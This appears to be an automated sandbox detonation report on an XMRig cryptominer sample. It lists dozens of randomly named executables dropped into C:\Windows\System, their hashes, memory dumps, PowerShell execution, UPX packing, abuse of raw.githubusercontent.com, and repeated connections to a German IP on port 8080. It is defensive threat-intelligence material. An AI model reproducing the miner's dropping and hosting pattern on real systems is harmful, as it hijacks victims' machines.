C:\Windows\System\wQalpXU.exe

C:\Windows\System\XMBfsTv.exe

C:\Windows\System\XMBfsTv.exe

C:\Windows\System\TyHQusO.exe

C:\Windows\System\TyHQusO.exe

C:\Windows\System\QBxkZru.exe

C:\Windows\System\QBxkZru.exe

C:\Windows\System\QLDvHOM.exe

C:\Windows\System\QLDvHOM.exe

C:\Windows\System\xPKMUqc.exe

C:\Windows\System\xPKMUqc.exe

C:\Windows\System\OyLYSrZ.exe

C:\Windows\System\OyLYSrZ.exe

C:\Windows\System\PwszQlR.exe

C:\Windows\System\PwszQlR.exe

C:\Windows\System\UauEAdV.exe

C:\Windows\System\UauEAdV.exe

C:\Windows\System\ChQozpI.exe

C:\Windows\System\ChQozpI.exe

C:\Windows\System\BOCmiaY.exe

C:\Windows\System\BOCmiaY.exe

C:\Windows\System\KtcDjHC.exe

C:\Windows\System\KtcDjHC.exe

C:\Windows\System\daVOnIt.exe

C:\Windows\System\daVOnIt.exe

C:\Windows\System\zesuQrs.exe

C:\Windows\System\zesuQrs.exe

C:\Windows\System\evfvVwu.exe

C:\Windows\System\evfvVwu.exe

C:\Windows\System\mVzivJv.exe

C:\Windows\System\mVzivJv.exe

C:\Windows\System\WAzacfm.exe

C:\Windows\System\WAzacfm.exe

C:\Windows\System\qnFLPUM.exe

C:\Windows\System\qnFLPUM.exe

C:\Windows\System\SaaQwJH.exe

C:\Windows\System\SaaQwJH.exe

C:\Windows\System\hJjfaZK.exe

C:\Windows\System\hJjfaZK.exe

C:\Windows\System\gxLnphZ.exe

C:\Windows\System\gxLnphZ.exe

C:\Windows\System\CTriAEb.exe

C:\Windows\System\CTriAEb.exe

C:\Windows\System\ybXnfLe.exe

C:\Windows\System\ybXnfLe.exe

C:\Windows\System\IHhkLpa.exe

C:\Windows\System\IHhkLpa.exe

C:\Windows\System\puRhRtz.exe

C:\Windows\System\puRhRtz.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp

Files

memory/2764-1-0x000000013FAD0000-0x000000013FEC6000-memory.dmp

memory/2764-0-0x0000000000180000-0x0000000000190000-memory.dmp

C:\Windows\system\irnYcmS.exe

MD5 6925bed05a05a5a96a91889cc42fe891
SHA1 2192a659e534b4f682d7973fb0397f9ca6a6af2e
SHA256 bac3c9aab033bf6e0515d5476ed7c066407812dc22b6c4542c24d300105877f3
SHA512 5948ee28f44c8eb14eeda19b078e6cf554309b9bd769e40b8694c6702b67f545e8b20490d8a7b4b20cecc9fc0720d5b8cfb27c8025948e4c00f47be9f26686f0

memory/2764-7-0x000000013F5A0000-0x000000013F996000-memory.dmp

\Windows\system\JzdoPEB.exe

MD5 4cf142f459e29a06438730cb70ad6085
SHA1 6e3136907ed95772753d85ac4a18e597d1f21f0b
SHA256 a36c5fe05ab97cffdece117a60cb78fe922abfb475ef24d86884747762c2d702
SHA512 210dff343aed1c6e10139095785922784b0540a783f0568d91dfbbe0a5546d67ba6b0c071a8a8c65e9d7025aabf274e732bcb2c325d7d6d677aa297a85f61e64

\Windows\system\VlXazjk.exe

MD5 6d559b93fa38d58bf77bead3747e5fa3
SHA1 5d60e5625d9a5ea752631f9b1dce3aeeae587990
SHA256 aa6368860af9d615b6c12bd18492097aaa66c30a5538c5dbc0f9ad2bbebc2487
SHA512 cca74422f50bb22e3faa26e7023333bb70b93d5ba68555783406b2b2dab6c9fdd39b508bea663aa565e3466df7b2ccd6a111b5e52cdb4a3b19e6b344c86f884d

C:\Windows\system\eqEWWtA.exe

MD5 72564d31132d71b6c28c02a1d0be1a17
SHA1 75acf9a19834c0b6bf180bc0d7f605598ae88dff
SHA256 da49d7ecd313535fcef4ab4c854e45beb3c062049a41913bf26e22b2f85843af
SHA512 6b4e75dc7733abbf9f1b66df4d47c96c8165c93286e570b92bc1d35e33faad0a8989cf37a242ed8df050d32bc367cf759e23ea262b58185c8dca12c62d23c045

memory/2216-42-0x000000013F070000-0x000000013F466000-memory.dmp

C:\Windows\system\KsKApsH.exe

MD5 33d89779939522ee0bf8d268326e80d8
SHA1 241c1afca145a4c248c109a115f94cfcf061f80c
SHA256 17d1c849bb8a50b7f70ad064c3223cb080c7d18984c3a927b3eb90ad500870a9
SHA512 939cdf949985a6c61d3993a83954188ecdf5bebd37dd6a55d53521c1c55b63643ec929c24ffec38b5ba35c0b54cfb18886280c9df89f7ac48b0ece5fbe8cbac1

C:\Windows\system\jsLedUI.exe

MD5 088a8d4c066e32057fad3055bfe8a4c7
SHA1 f26e64ef8630ede4d854a121dcc2207271d7ea7a
SHA256 2d5808e9fd4ac30c7e7817c2b60f64efa25a235cf47a24606eec5e354b98ce45
SHA512 2b70d97c648eea902aadb04dfe7aec3fdd9f905f95890321c581cb82d2f084da79a3033fc65771ed6e6c87ca13959ac925fe1ef4969a70fd6a0e358fbdb5a2d7

C:\Windows\system\NNoEWkv.exe

MD5 486ad8dbe778811ccfd883d2d75fccf8
SHA1 7bcfd1cf7b32b7990f9dbf7a6077c7a1c812ce2d
SHA256 ad8729c34081e5da69a7ade4838940d8905e0eda81903477dabe250067600178
SHA512 ad7e685e8547d29aaa3f023a244f2e694f6cfd8f52726b1681f2e4530f6ca8068dc523545eff03b8225efca08809732a1563ba57eaa5142e3c1c501c19bc44c0

C:\Windows\system\hPOwnzY.exe

MD5 b57adc2fd5acfd3493700c8d06b5ca38
SHA1 25c60cecd0b5d535ae20bbc153de748266f671f6
SHA256 f612d33388a3615c3a46d4f88588e7d491a6e4ac50938faa2eb1bbc10e651d39
SHA512 1af426e8d70421aed2dd9bf1b252fc23f8e83b4e96968c20dd80d0aeae41e916cef1a0a8bc52cfb6410fa0a05b6c547c5a11af54fae06a297fe0d0f1d0ea5ce9

C:\Windows\system\dnxtNlp.exe

MD5 3f5a021473ea70d915bc4a3d39a0ccb3
SHA1 5bb755bbbf4359a80e08332956a7d65bc937051d
SHA256 0ef9022d3bc5c64ad93cd1e136050a0266c85afe0315ea1a43b0e03daf64e38d
SHA512 ee6ab4f8e37c04ea7a250a9311246275f1ddf949fd0ffa626635cf9b1609ce350fd3c48aed1ca508f3accb8fcb3b8a12b8c5514d51aa40e20207839f2718c850

memory/2152-181-0x0000000002390000-0x0000000002398000-memory.dmp

memory/2896-194-0x000000013FDD0000-0x00000001401C6000-memory.dmp

memory/2764-196-0x0000000003260000-0x0000000003656000-memory.dmp

memory/2544-205-0x000000013FC60000-0x0000000140056000-memory.dmp

memory/2764-330-0x000000013FAD0000-0x000000013FEC6000-memory.dmp

memory/2700-188-0x000000013F2D0000-0x000000013F6C6000-memory.dmp

memory/2468-195-0x000000013F4A0000-0x000000013F896000-memory.dmp

memory/2764-193-0x000000013F4A0000-0x000000013F896000-memory.dmp

memory/2764-192-0x0000000003260000-0x0000000003656000-memory.dmp

memory/2748-191-0x000000013F760000-0x000000013FB56000-memory.dmp

memory/2152-180-0x000000001B1A0000-0x000000001B482000-memory.dmp

C:\Windows\system\NOZrvRT.exe

MD5 7bbdd83b9d6ed593f88cc810dedc717a
SHA1 bbc9c275ea36626b0c6fcdcf15021465d1e8c3e5
SHA256 7ed05b59dc4a126fb54994304b2b5c1eca394020d350abffaaa90c7cbd07f2f7
SHA512 5038cf4d1b8ba3fe8ec6b334c79cc26e5cf0785728b748ab41726111840e2a7e161d983cbd0d78f7c2d21a25c1cfd1e894f6cd064da769dc70bd2cb25abb2108

C:\Windows\system\slssFJi.exe

MD5 74f6083152c8dbfcf3f1631aecedefea
SHA1 f8352ef0d5c79fef074e584583a5a408e1ac7c59
SHA256 084e1404d528c17333adbded3016b439955c78c9554cf6fac2fc0cfaa1f763d6
SHA512 302d606f72f0626796313b06139b57241334e001b8f3f5a4eaad8d5b729bb85d736cae161b23a922ab64f749601cf0570a61acb9265fb1bb22922ac538297fd4

C:\Windows\system\KQxgSSw.exe

MD5 5eb99dddb1a3336c3b02d3c7ac9ecb50
SHA1 26a7ce1818c65d9c06f39de0017363d53da4a397
SHA256 d9f30a90b8452e15cfd501cc56067fb0f704e6f0ab419487619d7793d5d2f484
SHA512 1ec599c2d3515f28944fd7ed3756d7f2c3df1f45d643c8bb4ba7eb7fbcf5619cd9263438513ffc137d27af03a775d8e414160f87426f614646bf7ea3b4e90229

C:\Windows\system\OAhIsyR.exe

MD5 5ae9a9b75fc3c708d3a4faaa441c99b2
SHA1 b2d0e38fb68a8c5a4cc98aa20e74d347734dfaaf
SHA256 e8fa899d2bc22d8fe4228683ccbc258dd3f6108eccbbd2f87f0588c1bc67a4d7
SHA512 d06a11980e4284b33a0d52be83d8e2fb0cceed930d097ed6ca48800657da3958782c0bf2365888af8031ebacfab84a7e6716ac17088446aa4d5867642c24c34d

C:\Windows\system\lkYiSyZ.exe

MD5 bbcc0600b7bc06b0267065e3f2fff46f
SHA1 49cfd18a649d9561e4afbead3392c13ec211a664
SHA256 06894fc7912a553dbc10f5494fbcc8de609e6cd1d83bdb98207f0d790037af6f
SHA512 76125cca6e2454cd2c9aaf751a061d7ebd607353fd2ea490cf689f5c24d107bbd095f88082af02ad25b1b43a8614e4de11ee89dc5594d434ab9ae1d39782c30b

C:\Windows\system\pnxCrZd.exe

MD5 3590003d6a6c94e19e6145dd80b4dcc8
SHA1 cc60eeb45c63f12210861284e4edd6f7c47e4a00
SHA256 2596a4c6ff07fd1a5e1326673712d0b06de3bf892c149d8dc15c59477c247137
SHA512 147ef08e1d30b372e7ef6dbb426f77fd66dd146418522edda4e39a045d7dfdaef5a1721e784e02062bf509c571df9908087c21da52523f808af1ee2b0645f296

C:\Windows\system\mHbVdcn.exe

MD5 1635c9b4c0083759fba2a03ba88620b9
SHA1 8a73e26d32a022811c4ca8be4333aff206f0a687
SHA256 4f68d493509996463101d4ae30cb704fb5cc79717f747560dd46cb559e914269
SHA512 2fbdf10eae2746ccfedb42e9bcfcf6b4e8c8386324dc58be9d771874c922d3145a9f1a0269ec6a72920af29b436b1dbd4bd96d6fe84bfd0e82256341275e63d3

C:\Windows\system\BEExAhH.exe

MD5 71f651872782ff982dc854ece7d6a140
SHA1 a4c4042f3ac66cc296bf1e0230f06fdd9c444ff0
SHA256 17227cc88463c45211bbc0c10bc523404f9f39c5a1298f7c380c1fc7b97112b7
SHA512 307483214a2b5413ad32c01f08013a7d682f65ae1f4e1b76c2145b19af4079e6b3f44e7cd3bbaeca31fd54897677872bb60f01644c19e42e5859b1a98d9ec262

C:\Windows\system\imXwvzV.exe

MD5 7b0f800b5ae9f32b688ed83ed7949edc
SHA1 feffa0ec0e47f213d44f01ac882840af96ac9442
SHA256 0a6e6fbf7432ca186d983b977af1608e36fb3cf577c7387ce5d7e788d51081c4
SHA512 b96104b7dec8c7a16be954aacd729f67832a938195663efaf142431b05adcc26547af3a06fa9ca6a0c66d719d3c84e047f3d32b5017b4e190c15fa2a0e253e4f

C:\Windows\system\YiKNMsk.exe

MD5 78a8a292e4edfc15576178d51abac7bd
SHA1 8e2afc1a97d34c0264401f9cf01b88a8b7fb66d3
SHA256 8681ffd6fe82926dc54827822db98097e9cdd2c804490d2311c7c1d886f02214
SHA512 dd62c4ea04a721e58ddf7cfadd2a760a893dec47bab866e8dd9182d743fd59f0b3bafc968a269ed86e8e63cf89169ed910e0e4b5da4154ffebc0a591710a697f

C:\Windows\system\ysiLQfc.exe

MD5 4b03e6b98c189aab4c1b78adf5a789b2
SHA1 793d499a3dd16de434a97907dd710209b54f519f
SHA256 259c2066398c9dbb0f72732a0fa8eeaf86d7e02dc6fda286cacf244874331dd4
SHA512 45b80dbe94ace3055d22bccbb7d1bddaef68d2ce33fa5cd4665ce7530600798d721e1c6718b54c69cb1fc6a4518d14a151157018aa67759d3284710ed8f39bdf

C:\Windows\system\GBXJJMd.exe

MD5 983e6b1263940189d07d8e2c71527e56
SHA1 b752fe8ca33f807f87efd15934d0acec173cb0e2
SHA256 08e23f931fae0ac82c41580cbd49e979378402963b785e5f7d366846d7a8fd99
SHA512 22a6a00e2f8c923fc1fa9ee3484f1faa22d70c349c2a27ff7ecc2b0a6997b3be18c8ba92efc3c0118a403180cafc887962271ec33a4e54ffc5235701cd008da8

C:\Windows\system\KPKlOrK.exe

MD5 49d06e845ce1623a2427e09ad64ee3d6
SHA1 822895959b6c7ab027da819fc203240407994c6d
SHA256 3bfce65a4c02a3c3131b91f6744b79548b39e42e4c3cff032fa4fca7b032d0c7
SHA512 7c58fdae3b567276e1560b877d14394303db213c21ac5a2919e816121ff4c0eb526438ef4fc75680ce0f870051cbceb8ec5cf1faf4c0f6684889d91707aa896f

C:\Windows\system\kcJdNxc.exe

MD5 2b395d37b2e6a26f917c067dbd2a254f
SHA1 6de1aa54268d871b0bcf5d35784e2f2d667c342f
SHA256 6835cd837f5eb956372303ddc7fd5f74364e72ada0c39b98b4b9851bacd29e79
SHA512 49b06ec4e979ec9d000ca62decb1bb76157988278cea4075692e69a9766c2ebdd790a713c0ab229da60cc4ea318e22543b07a196dfa1afbe31c00037712a5b4a

C:\Windows\system\gyCwhPi.exe

MD5 e81dcd23672b4bdd11106b3cfe62793a
SHA1 558ec5cbcd2b7f2aa7117ba0668e5d7696d2bdd0
SHA256 ec2e33b00711af251e1673d4cf97177aefced65b0aa0bc330dbca950f7a260de
SHA512 75536101a4b3bd5eed47521991d877550912714a7fc94d118c33bce609a684469dfceab1f05cf199c6cde332c983ba83489db9b8c8f23c0148f216d801bcb447

C:\Windows\system\hQiMafa.exe

MD5 103cf1b90879759636bfe237d6b37c63
SHA1 39a2129de04d25295d1d1d10d5fab1eab4a2c3d1
SHA256 bd825c9c8c375fc521deba46d9b25381589e23963ac1c6b921565c6d7d0cf43e
SHA512 38f8c971104c6a7139398c3bc8cc4fe90800904d4fb1eb4e8c8cf7c3c9a1c7c1227d0d44532875e6502b073c96ef5a3978cff0512e616bfef04cf81377f1bfb8

C:\Windows\system\PKvqyuA.exe

MD5 5d05f3968bae8f670fca3cd1bb13f57e
SHA1 f498c2bb0d80d41debef570c6434ae5a808bd7a9
SHA256 985528929678722fe9689904592d4ab356abfd8e1758e472a946c29239dcacce
SHA512 c5bd8281dcfaecf0af7b6ce5e9795ce773b04fd594d5b1c73864c80e6b81ca012c6d655f48694265061d76416c07278bb92128c16e9219b803c58ca040022d11

C:\Windows\system\ENwIaBS.exe

MD5 52aec1ffaed2ec2f8552d68b4fba61e4
SHA1 6786877580d23ea2528e93bd08934179389199ff
SHA256 b477750a14bb90b5963f7fbadcff1a025ed1693843fa0b0dd97735db7e127467
SHA512 6bcf926507d5f2c5d879b62b0e78775c6a22de9e8eaaefbf6f814765709f618e16f030d5f8616050814681e3b4b757b86388c0d284349493405b34a90334a883

C:\Windows\system\DyiqsAf.exe

MD5 3cfc4a022724e7c14794d38c816f83c3
SHA1 543ec7c74a0efe627ece8f5be1be7ca849fb1610
SHA256 43e941d130ff25aa51c0fdc43c5ca2c6401db4a330b204ceb072973cdc46f125
SHA512 52cc93c056a3639c3c9d29d282697d860ee33cdd16e7cbc5ceba9f15ef34ea87f4e2ef76e170efed088647e80412bef1212adfba026c01e36f71d31c1a4ebfd2

\Windows\system\wTNkYxh.exe

MD5 0fd987d3dda1ec8903884313a16f9816
SHA1 4594409ebcfaaac3d51b4c17165a4646d400bea4
SHA256 f8977b211f059aba4130ea2b542c653b61400f7dabddbaf3af843c308db70e59
SHA512 dc6f3ef85353b0824cf58519ff8a99fad9b7ab338da26ca79ea85462163325739605f41b6b00aa1ce3525c01ec5c94e6f4acd44f5e4ec2d56ddb5aeaf822365a

C:\Windows\system\imNdmOx.exe

MD5 543f04eec64bfceb658cf09e322d60b9
SHA1 4e4b8e7563f5374ae7cd00c381c715d759a1063a
SHA256 8cfbb5eaa765baeb231591f97e25049ed57209c29a12d8f73d6107c940b1e742
SHA512 f4d71c51adf757eaaa6a007583af5d60d3f0893e1d7a037ed998eee60b3cab0354de59f73595d0b4933ea934aae1812a78f1be05f6a9af5265816661b4019865

memory/2764-40-0x000000013F070000-0x000000013F466000-memory.dmp

\Windows\system\ndXGGpK.exe

MD5 bb7e18f22ffcfd3f7c27b255868b59a5
SHA1 a25e7b073a8bf6e651cdb02b32055dccca0421a5
SHA256 fdf3d3b63a6b63ca3c6b896ffd4631be0e7c90841a6e0d4beb78deb109facbc9
SHA512 3648c9f6d377a75d1085aff01715e80945b56c6a2587fe06f32b931873aeebf7937887032a53cb1946409b313c3f85016605c9c1d484929c9ea87e52203f10c7

C:\Windows\system\wHcmFkc.exe

MD5 e02311e656fa898244609fa4ee210334
SHA1 66eff6b4b63488e1936e9efd037b1d8ccdd97dd3
SHA256 992da9f8fc3f350e86d2a14bb8a6f9512d8b7a395b445d6ca31e2c8eb3354b54
SHA512 a18a7bf29c4ad14833cae151b7b92cba1dc0d56d711f0afe3acfa4493f0676a2bdd17cf06f4478f417d773e613182e854205b4d8140c03cb361b8768a4d2c037

memory/2764-43-0x000000013F2D0000-0x000000013F6C6000-memory.dmp

memory/2152-35-0x000007FEF605E000-0x000007FEF605F000-memory.dmp

memory/2152-34-0x0000000002440000-0x00000000024C0000-memory.dmp

memory/2648-33-0x000000013F220000-0x000000013F616000-memory.dmp

memory/2764-16-0x0000000002AA0000-0x0000000002E96000-memory.dmp

memory/2188-15-0x000000013FD60000-0x0000000140156000-memory.dmp

memory/2676-14-0x000000013F5A0000-0x000000013F996000-memory.dmp

memory/2152-185-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

memory/560-200-0x000000013FD50000-0x0000000140146000-memory.dmp

memory/2764-186-0x0000000003260000-0x0000000003656000-memory.dmp

memory/2764-187-0x0000000003260000-0x0000000003656000-memory.dmp

memory/2764-201-0x0000000003260000-0x0000000003656000-memory.dmp

memory/592-202-0x000000013FDE0000-0x00000001401D6000-memory.dmp

memory/2764-203-0x0000000003260000-0x0000000003656000-memory.dmp

memory/1372-204-0x000000013FC80000-0x0000000140076000-memory.dmp

memory/2764-751-0x000000013F220000-0x000000013F616000-memory.dmp

memory/2152-881-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

memory/2764-2127-0x0000000003260000-0x0000000003656000-memory.dmp

memory/2764-2132-0x0000000003260000-0x0000000003656000-memory.dmp

memory/2764-2150-0x0000000003260000-0x0000000003656000-memory.dmp

memory/2764-2151-0x0000000003260000-0x0000000003656000-memory.dmp

memory/2896-2678-0x000000013FDD0000-0x00000001401C6000-memory.dmp

memory/2468-2670-0x000000013F4A0000-0x000000013F896000-memory.dmp

memory/592-2680-0x000000013FDE0000-0x00000001401D6000-memory.dmp

memory/2676-2683-0x000000013F5A0000-0x000000013F996000-memory.dmp

memory/560-2679-0x000000013FD50000-0x0000000140146000-memory.dmp

memory/2216-2708-0x000000013F070000-0x000000013F466000-memory.dmp

memory/1372-2720-0x000000013FC80000-0x0000000140076000-memory.dmp

memory/2648-2675-0x000000013F220000-0x000000013F616000-memory.dmp

memory/2748-2674-0x000000013F760000-0x000000013FB56000-memory.dmp

memory/2544-2673-0x000000013FC60000-0x0000000140056000-memory.dmp

memory/2188-2672-0x000000013FD60000-0x0000000140156000-memory.dmp

memory/2700-2671-0x000000013F2D0000-0x000000013F6C6000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-12 10:27

Reported

2024-06-12 10:30

Platform

win10v2004-20240508-en

Max time kernel

147s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\GuQYdAi.exe N/A
N/A N/A C:\Windows\System\XpOIqaF.exe N/A
N/A N/A C:\Windows\System\ibJwJkO.exe N/A
N/A N/A C:\Windows\System\ABISsQx.exe N/A
N/A N/A C:\Windows\System\lzjuSaZ.exe N/A
N/A N/A C:\Windows\System\LhPNcwc.exe N/A
N/A N/A C:\Windows\System\OwxPNSm.exe N/A
N/A N/A C:\Windows\System\UMxQyFW.exe N/A
N/A N/A C:\Windows\System\VtUfpKp.exe N/A
N/A N/A C:\Windows\System\brfPXjn.exe N/A
N/A N/A C:\Windows\System\FiUftQL.exe N/A
N/A N/A C:\Windows\System\yYgbnon.exe N/A
N/A N/A C:\Windows\System\RPjlMqe.exe N/A
N/A N/A C:\Windows\System\qMTBAsP.exe N/A
N/A N/A C:\Windows\System\iIdMqQG.exe N/A
N/A N/A C:\Windows\System\lUZwSgU.exe N/A
N/A N/A C:\Windows\System\ewqbMtT.exe N/A
N/A N/A C:\Windows\System\uPckzTH.exe N/A
N/A N/A C:\Windows\System\cDhwHWH.exe N/A
N/A N/A C:\Windows\System\FVvaqxz.exe N/A
N/A N/A C:\Windows\System\SCCvpyQ.exe N/A
N/A N/A C:\Windows\System\xyHcubE.exe N/A
N/A N/A C:\Windows\System\OAiCHue.exe N/A
N/A N/A C:\Windows\System\ihkzmUl.exe N/A
N/A N/A C:\Windows\System\QosOhYI.exe N/A
N/A N/A C:\Windows\System\WZKnJMo.exe N/A
N/A N/A C:\Windows\System\BsDjvmz.exe N/A
N/A N/A C:\Windows\System\pIqAcxI.exe N/A
N/A N/A C:\Windows\System\zPpOCVO.exe N/A
N/A N/A C:\Windows\System\vhHmvFP.exe N/A
N/A N/A C:\Windows\System\RXMZPuQ.exe N/A
N/A N/A C:\Windows\System\MllIDLP.exe N/A
N/A N/A C:\Windows\System\kWYQufV.exe N/A
N/A N/A C:\Windows\System\cPQTuvm.exe N/A
N/A N/A C:\Windows\System\XLUuMDH.exe N/A
N/A N/A C:\Windows\System\IFBTFEo.exe N/A
N/A N/A C:\Windows\System\lWLhAxV.exe N/A
N/A N/A C:\Windows\System\FripFsA.exe N/A
N/A N/A C:\Windows\System\bZItqNc.exe N/A
N/A N/A C:\Windows\System\sDYEvQZ.exe N/A
N/A N/A C:\Windows\System\rkYnWSY.exe N/A
N/A N/A C:\Windows\System\QBMDXYP.exe N/A
N/A N/A C:\Windows\System\UvGZeAa.exe N/A
N/A N/A C:\Windows\System\vBKLgfl.exe N/A
N/A N/A C:\Windows\System\xHsbmJX.exe N/A
N/A N/A C:\Windows\System\XyuvFJa.exe N/A
N/A N/A C:\Windows\System\xKRLEgo.exe N/A
N/A N/A C:\Windows\System\Nfqlota.exe N/A
N/A N/A C:\Windows\System\LdbzhIq.exe N/A
N/A N/A C:\Windows\System\UTisUqk.exe N/A
N/A N/A C:\Windows\System\NeMwWTX.exe N/A
N/A N/A C:\Windows\System\SbXdABZ.exe N/A
N/A N/A C:\Windows\System\EZcUlkX.exe N/A
N/A N/A C:\Windows\System\XurQWzv.exe N/A
N/A N/A C:\Windows\System\pSlVyGy.exe N/A
N/A N/A C:\Windows\System\RAUxcdL.exe N/A
N/A N/A C:\Windows\System\jUEclnp.exe N/A
N/A N/A C:\Windows\System\IdsLujJ.exe N/A
N/A N/A C:\Windows\System\YXplQkM.exe N/A
N/A N/A C:\Windows\System\OYKyNqG.exe N/A
N/A N/A C:\Windows\System\bPKmwDh.exe N/A
N/A N/A C:\Windows\System\qFONnOp.exe N/A
N/A N/A C:\Windows\System\dTiQBeO.exe N/A
N/A N/A C:\Windows\System\pDUmbbw.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\nzHhTiN.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\CrlGUcy.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\iwlTfXs.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\MtgNjZE.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\lKAwUCU.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\UvGZeAa.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\yFStWOD.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\undDSFj.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\wCuOFGO.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\tTfsKqe.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\AvqgAPa.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\qgesumz.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\BSXqiUS.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\mpcqdlX.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\laSZfwv.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\CWbdhTa.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\zQWTsBK.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
